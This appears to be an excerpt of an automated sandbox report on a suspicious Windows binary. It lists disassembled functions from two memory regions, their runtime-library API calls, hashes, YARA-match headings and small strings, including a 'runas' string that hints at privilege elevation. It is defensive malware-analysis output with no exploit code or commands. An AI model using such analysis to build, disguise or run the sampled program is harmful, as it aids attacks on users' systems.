                    • Instruction ID: 7abbdbb34623e3d66a07d2ca658b17e811254b9d440a9fd3c896dc1dc49c1de3
                    • Opcode Fuzzy Hash: 8d52b872a16da2ecde656976662c890ef9145f26e1d0b0297742ad47c23117d8
                    • Instruction Fuzzy Hash: F4F06D32644615BB8B325BA2DC0899AFF7AFF443A57008124F92AC7820DB31E911CBD0
                    APIs
                      • Part of subcall function 0041FF66: TlsGetValue.KERNEL32(?,?,0041F4E7,0041F314,?,?), ref: 0041FF6C
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0042502F
                      • Part of subcall function 0042E30E: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0042E335
                      • Part of subcall function 0042E30E: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0042E34E
                      • Part of subcall function 0042E30E: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042E3C4
                      • Part of subcall function 0042E30E: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042E3CC
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 0042503D
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00425047
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00425051
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
                    • Instruction ID: 591bd9b18c1ea594323a38232f6cf7a467bdae74b08f21c6b28571b33805ae9f
                    • Opcode Fuzzy Hash: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
                    • Instruction Fuzzy Hash: 2DF0F63170053927CA25B727E81286EF6659F91B58B80002FF91057252EF7C9E498BCE
                    APIs
                      • Part of subcall function 021A01CD: TlsGetValue.KERNEL32(?,?,0219F74E,0219F57B,?,?), ref: 021A01D3
                    • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 021A5296
                      • Part of subcall function 021AE575: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 021AE59C
                      • Part of subcall function 021AE575: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 021AE5B5
                      • Part of subcall function 021AE575: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021AE62B
                      • Part of subcall function 021AE575: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021AE633
                    • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 021A52A4
                    • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 021A52AE
                    • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 021A52B8
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
                    • String ID:
                    • API String ID: 2616382602-0
                    • Opcode ID: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
                    • Instruction ID: 84d1bef0bbba0434b4fef74e0b28c6085d71992b3a849bbea1672c0b412003a2
                    • Opcode Fuzzy Hash: 70a698541e2e15fa6626dca2384dcb953701250920abc52d754e3547d00c3c09
                    • Instruction Fuzzy Hash: E0F0F63DE84614BFCB25B7658830A6DF7279F91B50F50412AE52183290EF649A158FC2
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0219FB78
                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0219FBAB
                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0219FBB7
                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0219FBC0
                      • Part of subcall function 0219F554: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0219F576
                      • Part of subcall function 0219F554: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0219F597
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Concurrency::critical_section::_Timer$Acquire_lockAsyncBase::ContextCurrentDerefH_prolog3LibraryLoadLockNodeNode::QueueRegisterSchedulerSwitch_to_active
                    • String ID:
                    • API String ID: 2559503089-0
                    • Opcode ID: 6202bdfdb5770ea946800c78cd8ea731ca40aa09cdf17d07ebd0c2e6249b1ab2
                    • Instruction ID: a445ba203adf9f360ce9bae7aa7dbd171a7339bc3286237ef9f8c64f9013e773
                    • Opcode Fuzzy Hash: 6202bdfdb5770ea946800c78cd8ea731ca40aa09cdf17d07ebd0c2e6249b1ab2
                    • Instruction Fuzzy Hash: 2AF0E9316C02087F9F38BEB4586597D32974F81324B084129A513DF7C0CF71CD06DA95
                    APIs
                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00429519
                      • Part of subcall function 0041F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00425486
                    • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0042953D
                    • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00429550
                    • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00429559
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                    • String ID:
                    • API String ID: 218105897-0
                    • Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
                    • Instruction ID: d6309d90a18d788d3908b1ccc534cdb32d682efef3bce2effefe7705fdda7df8
                    • Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
                    • Instruction Fuzzy Hash: ADF0A731700A306FE662AB55A811F6B23D49F44719F40951FE41B97282CE2CEC82CB99
                    APIs
                    • WriteConsoleW.KERNEL32(004087A0,0000000F,0045FB20,00000000,004087A0,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0), ref: 00446AE6
                    • GetLastError.KERNEL32(?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000,004087A0,?,004405E9,004087A0), ref: 00446AF2
                      • Part of subcall function 00446AB8: CloseHandle.KERNEL32(FFFFFFFE,00446B02,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000,004087A0), ref: 00446AC8
                    • ___initconout.LIBCMT ref: 00446B02
                      • Part of subcall function 00446A7A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00446AA9,004451A7,004087A0,?,00440095,00000000,?,004087A0,00000000), ref: 00446A8D
                    • WriteConsoleW.KERNEL32(004087A0,0000000F,0045FB20,00000000,?,004451BA,004087A0,00000001,004087A0,004087A0,?,00440095,00000000,?,004087A0,00000000), ref: 00446B17
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 2847bb895f9299352194151eea3b2518d9960724f28a171724648c66562c6119
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: 1DF03736101664BBDF621FA5DC089DA3F65FB457A2F014022FE1C95131D672DC20DB9A
                    APIs
                    • WriteConsoleW.KERNEL32(02188A07,0000000F,0045FB20,00000000,02188A07,?,021C5421,02188A07,00000001,02188A07,02188A07,?,021C02FC,00000000,?,02188A07), ref: 021C6D4D
                    • GetLastError.KERNEL32(?,021C5421,02188A07,00000001,02188A07,02188A07,?,021C02FC,00000000,?,02188A07,00000000,02188A07,?,021C0850,02188A07), ref: 021C6D59
                      • Part of subcall function 021C6D1F: CloseHandle.KERNEL32(00462970,021C6D69,?,021C5421,02188A07,00000001,02188A07,02188A07,?,021C02FC,00000000,?,02188A07,00000000,02188A07), ref: 021C6D2F
                    • ___initconout.LIBCMT ref: 021C6D69
                      • Part of subcall function 021C6CE1: CreateFileW.KERNEL32(00457658,40000000,00000003,00000000,00000003,00000000,00000000,021C6D10,021C540E,02188A07,?,021C02FC,00000000,?,02188A07,00000000), ref: 021C6CF4
                    • WriteConsoleW.KERNEL32(02188A07,0000000F,0045FB20,00000000,?,021C5421,02188A07,00000001,02188A07,02188A07,?,021C02FC,00000000,?,02188A07,00000000), ref: 021C6D7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction ID: 90d7394f3f83023c0314896e6cae26c1314d06576f085dca4c2dba5943328c78
                    • Opcode Fuzzy Hash: 68f8837eb1d4a2712d10f3c5b8a7bf099e143a904c0dfdbb60282304a99716f4
                    • Instruction Fuzzy Hash: E2F01C3A141298BBCF621FE5EC08A993F2AFB893B1F204025FA1C85130D772C820DB95
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: b12352c27eb35c7801b30b77c84677b55ae88f5f3268c2bda28ff34a47bf5de4
                    • Instruction ID: 3c6a32df5dad7af30149616890935c29a92b351d457238d9866b5c48c106959f
                    • Opcode Fuzzy Hash: b12352c27eb35c7801b30b77c84677b55ae88f5f3268c2bda28ff34a47bf5de4
                    • Instruction Fuzzy Hash: 32E11371A50144AFEB08FB78CDC5B9DBB63AF81308F60865CE411AB3C5DB759A418F92
                    APIs
                      • Part of subcall function 0043E259: GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284
                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,avC,0043E512,?,00000000,?,?,?,?,?,?,00437661), ref: 0043E722
                    • GetCPInfo.KERNEL32(00000000,0043E512,?,avC,0043E512,?,00000000,?,?,?,?,?,?,00437661,?), ref: 0043E764
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CodeInfoPageValid
                    • String ID: avC
                    • API String ID: 546120528-551859807
                    • Opcode ID: 40678aea89edd431b2c9a3e3bda96fb4224bb9d3af1647208ffe2423ccba4704
                    • Instruction ID: 7136e37640ab4f9cfa26bf5a46befe49b79dc652285453c6057786630530e70e
                    • Opcode Fuzzy Hash: 40678aea89edd431b2c9a3e3bda96fb4224bb9d3af1647208ffe2423ccba4704
                    • Instruction Fuzzy Hash: C6512370E012059EEB249F73C8806ABBBF5EF88304F14646FD096973D2E7789546CB99
                    APIs
                    • ReadFile.KERNEL32(?,?,00000002,?,00000000,?,00000000,?), ref: 0044540D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileRead
                    • String ID: )ZD$)ZD
                    • API String ID: 2738559852-3993371512
                    • Opcode ID: 0eb56316cf27b920e1eb67f398ea9860885408d35e2d831988382829233ef988
                    • Instruction ID: fc353a334f2b284155b366ba4413ab3dfc7edfe09a6423858d2821c62ff71e0d
                    • Opcode Fuzzy Hash: 0eb56316cf27b920e1eb67f398ea9860885408d35e2d831988382829233ef988
                    • Instruction Fuzzy Hash: 4651E731A04619EBDF20CF58C881BEDB7B0FF05314F20856AD855AB392E3785981CB99
                    APIs
                      • Part of subcall function 021BE4C0: GetOEMCP.KERNEL32(00000000,021BE732,?,?,021B78C8,021B78C8,?), ref: 021BE4EB
                    • _free.LIBCMT ref: 021BE78F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: @"F
                    • API String ID: 269201875-3084318295
                    • Opcode ID: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
                    • Instruction ID: 2f8ac4aacac18265d36cfe77dfd95f80a5074ae81246d45626d8c84b57719f6b
                    • Opcode Fuzzy Hash: 9908dd6ab1a80c5fc09db8b12665e78ab5e05ea3aa24e2a155a3ad1beaefeb8c
                    • Instruction Fuzzy Hash: D731B071900209AFCB12DFA9C880BDE7BF5EF44314F550469E9119B2A0EB71D950CF90
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 0041B65E
                    • RaiseException.KERNEL32(?,?,?,?), ref: 0041B683
                      • Part of subcall function 00433B04: RaiseException.KERNEL32(E06D7363,00000001,00000003,0045E3B0,?,?,?,0045E3B0), ref: 00433B64
                      • Part of subcall function 00438BEC: IsProcessorFeaturePresent.KERNEL32(00000017,0043A72D,?,?,0043694A,?,?,?,?,00437661,?), ref: 00438C08
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                    • String ID: csm
                    • API String ID: 1924019822-1018135373
                    • Opcode ID: ad5d9faefd0c1ab4e9a02e3e4909efcbe63737fe706ed9a567fc9c955821b515
                    • Instruction ID: 9f88b0b7aede3b21d37810e77ce6789f3a807ab352a7de9bd37fa5025d97b667
                    • Opcode Fuzzy Hash: ad5d9faefd0c1ab4e9a02e3e4909efcbe63737fe706ed9a567fc9c955821b515
                    • Instruction Fuzzy Hash: A721AF31D01218AFCF24DF96C945AEFB7B8EF24714F14441AE845AB251CB38AD85CBCA
                    APIs
                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00431764
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004317AF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 3390424672-2046700901
                    • Opcode ID: 022a27bc18fa5d8226aa9ea097ec315d7e10c5cb17fb68df421d1453c8f8c9ce
                    • Instruction ID: 942ad2940211714a74bcc9dfb36523be2d48a1416fc9e5f4f6d4d921a905eb8f
                    • Opcode Fuzzy Hash: 022a27bc18fa5d8226aa9ea097ec315d7e10c5cb17fb68df421d1453c8f8c9ce
                    • Instruction Fuzzy Hash: 2F113639A002149BCB05FF58C88596D77A5AF8C365F18406BEC0297362DB3CED05CBD8
                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0041D21A
                    • ___raise_securityfailure.LIBCMT ref: 0041D301
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor___raise_securityfailure
                    • String ID: pWF
                    • API String ID: 3761405300-3254099572
                    • Opcode ID: 8d6445971c7e0862906b7c68462026e959eab2d4c9270191dfb96f7b545bb8f5
                    • Instruction ID: 8fd7279893b741caf15dcd92eb45e819b2951614e4b3fd08056ab3288de795f0
                    • Opcode Fuzzy Hash: 8d6445971c7e0862906b7c68462026e959eab2d4c9270191dfb96f7b545bb8f5
                    • Instruction Fuzzy Hash: D121BDB5600A04DAE714EF26F945A583BE4FB48304F54553AEA049BAB1F3F498A1CF0E
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    • Opcode ID: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
                    • Instruction ID: a9be1d7356db9bde33694ffb89096973f5cd6b257b37c16ae0656b7abf5e94eb
                    • Opcode Fuzzy Hash: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
                    • Instruction Fuzzy Hash: 0F01D831985A203AD52532355C82B6B12299B0D72CF20322BFBA0653E2FB8DCC3201DF
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID: x!F
                    • API String ID: 269201875-3062043068
                    • Opcode ID: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
                    • Instruction ID: 5524d76a09cbb271e12b594c598f5da8b77a17f8c1b689dc9363f76aabd0250b
                    • Opcode Fuzzy Hash: db21be25886df150d1c6f332858b9cadf02cf268a657b562b65237ce8408447b
                    • Instruction Fuzzy Hash: 6201F7315DDB307EC63776746E40AFE12396F07B28B160321FD20A54E0EB928D1146E5
                    APIs
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 00420CD7
                    • Concurrency::details::ResourceManager::ResourceManager.LIBCONCRT ref: 00420D2A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Resource$AcquireConcurrency::details::Concurrency::details::_Lock::_ManagerManager::Reentrant
                    • String ID: p[F
                    • API String ID: 3303180142-1832964472
                    • Opcode ID: be93dd124044e3a26704792a574e288825ec5497b2495a662014ec0407777033
                    • Instruction ID: 460490d00550286d74d196cd5a9549fc7c942c0fed1932104b3464a6bc3d5762
                    • Opcode Fuzzy Hash: be93dd124044e3a26704792a574e288825ec5497b2495a662014ec0407777033
                    • Instruction Fuzzy Hash: 510180B0F156249EDB10ABBA755135DA6E06B08318FA0406FE405EB283DA7C5E41876E
                    APIs
                    • GetOEMCP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E284
                    • GetACP.KERNEL32(00000000,0043E4CB,?,?,avC,00437661,?), ref: 0043E29B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: avC
                    • API String ID: 0-551859807
                    • Opcode ID: 45530060523da157e537cdb1f7866b3f2572323f108b7a3cdd4d943330284399
                    • Instruction ID: 791638059a19eb7d03b8e6799ac96854013f7a9a4db5e4c168316c4cba85a157
                    • Opcode Fuzzy Hash: 45530060523da157e537cdb1f7866b3f2572323f108b7a3cdd4d943330284399
                    • Instruction Fuzzy Hash: 15F0F630801202CBE704DFA6E8097AE37B4AB45339F1103D5E439962E2D7B4A841C78A
                    APIs
                    • RtlEnterCriticalSection.NTDLL(00465750), ref: 0041D11C
                    • RtlLeaveCriticalSection.NTDLL(00465750), ref: 0041D159
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: PWF
                    • API String ID: 3168844106-4189640852
                    • Opcode ID: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
                    • Instruction ID: 988e6a820899fd4ceb20f62ffb6a68805dae8dfe7a3415f919f541f0d2922133
                    • Opcode Fuzzy Hash: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
                    • Instruction Fuzzy Hash: 16F0E275900601EFC3149F14EC44AA677A5EB45736F20022EEA55473D0D7391C82CA1A
                    APIs
                    • RtlEnterCriticalSection.NTDLL(00465750), ref: 0219D383
                    • RtlLeaveCriticalSection.NTDLL(00465750), ref: 0219D3C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2354099714.0000000002180000.00000040.00001000.00020000.00000000.sdmp, Offset: 02180000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2180000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave
                    • String ID: PWF
                    • API String ID: 3168844106-4189640852
                    • Opcode ID: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
                    • Instruction ID: 1e35eae5f2aab1d559ec40e7b4a1f7d16a0b8f4c56d51c6636b5869001ca1e6b
                    • Opcode Fuzzy Hash: aa3b7ebb98d861874e14c42a3fd8d5994544321a17c487eeef023a4b97522d77
                    • Instruction Fuzzy Hash: F9F02734540600DFCB147F14ED44B2677A4EB41736F10023DEA55476E0D7311842CA16
                    APIs
                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0042B94E
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042B961
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                    • String ID: pContext
                    • API String ID: 548886458-2046700901
                    • Opcode ID: cb3ebfd47da852ef65d275a916c0fe48e2a73adc5c276bf3244062de85799675
                    • Instruction ID: 6d6ffe11be8a4b1ace8c2f2c8a58b350c0e533cc07d7fbfc7cd1cba97992ca6a
                    • Opcode Fuzzy Hash: cb3ebfd47da852ef65d275a916c0fe48e2a73adc5c276bf3244062de85799675
                    • Instruction Fuzzy Hash: 95E02B39B0020467CB04F7A5D845D9DBB789E84715710401BE911A3352EB78AA44C6D8
                    APIs
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004234FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2353139428.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2353139428.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2353139428.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_yjzllYsjlU.jbxd
                    Yara matches
                    Similarity
                    • API ID: std::invalid_argument::invalid_argument
                    • String ID: pScheduler$version
                    • API String ID: 2141394445-3154422776
                    • Opcode ID: 25f4eee51d5eef7acfdb44f59e56ba93899965d293b766ae16e0c4b89fe0dab4
                    • Instruction ID: 3122fea0a665ef1032727265859f97669ea40e48c80579a70b610642a631ca87
                    • Opcode Fuzzy Hash: 25f4eee51d5eef7acfdb44f59e56ba93899965d293b766ae16e0c4b89fe0dab4
                    • Instruction Fuzzy Hash: 28E04F34A40208B6CB26FE56E84BBC977749B1474BF94C157BC11111929BFCA78CCA89
                    APIs
                    • __EH_prolog3.LIBCMT ref: 021A255C
                    • Concurrency::details::_NonReentrantLock::_Acquire.LIBCONCRT ref: 021A2572
                      • Part of subcall function 021A2A99: Concurrency::details::ResourceManager::RetrieveSystemVersionInformation.LIBCONCRT ref: 021A2AA8
